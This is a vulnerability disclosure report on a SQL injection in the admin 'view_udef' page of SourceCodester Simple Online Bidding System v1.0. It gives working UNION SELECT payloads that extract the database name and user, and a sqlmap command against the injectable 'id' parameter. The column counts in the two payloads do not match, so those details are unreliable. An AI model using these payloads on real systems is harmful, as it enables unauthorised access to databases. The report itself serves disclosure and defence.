### Vulnerability Key Information #### 1. Vulnerability Overview - **Vulnerability Type**: SQL Injection - **Affected System**: SourceCodester Simple Online Bidding System - **Version**: v1.0 - **Official Website**: [https://www.sourcecodester.com/php/14558/simple-online-bidding-system-using-phpmysqli-source-code.html](https://www.sourcecodester.com/php/14558/simple-online-bidding-system-using-phpmysqli-source-code.html) #### 2. Vulnerability Analysis - **Route**: `/simple-online-bidding-system/admin/index.php?page=view_udef&id=1` - **Injection Parameter**: `$_GET['id']` - **Issue Description**: The parameter is directly concatenated into the SQL statement without any security protection, creating an SQL injection point. #### 3. Vulnerability Verification and Exploitation - **Verification Method**: Verified using UNION SELECT-based injection. - **Example Payload**: ``` page=view_udef&id=-2+union+select+1,2,3,4,5,6,7,8,9%23 ``` - **Result**: Returns 9 query results; by selecting appropriate display positions (e.g., position 5 and 6), the database name and current database username can be retrieved. #### 4. Exploitation Example - **Query Database Name and Username**: - **Example Payload**: ``` page=view_udef&id=-2 union select 1,2,3,4,database(), user(), 6,7,8,9%23 ``` - **Result**: Retrieved database name as `bid_db`, current database username as `root@localhost`. #### 5. Verification with SQLMap - **SQLMap Command**: ```bash python sqlmap.py -u "http://x.x.x.x/admin/index.php?page=view_udef&id=1" --cookie="PHPSESSID=xxxxx" ``` - **Identified Injection Point**: - Parameter `id` identified as injectable. - **SQLMap Detected Injection Types**: - Boolean-based blind - Error-based - Time-based blind - UNION query #### 6. Backend Database Information - **Database Type**: MySQL - **Web Application Technology**: PHP 5.5.9, Apache 2.4.39 - **Backend Database**: MySQL >= 5.0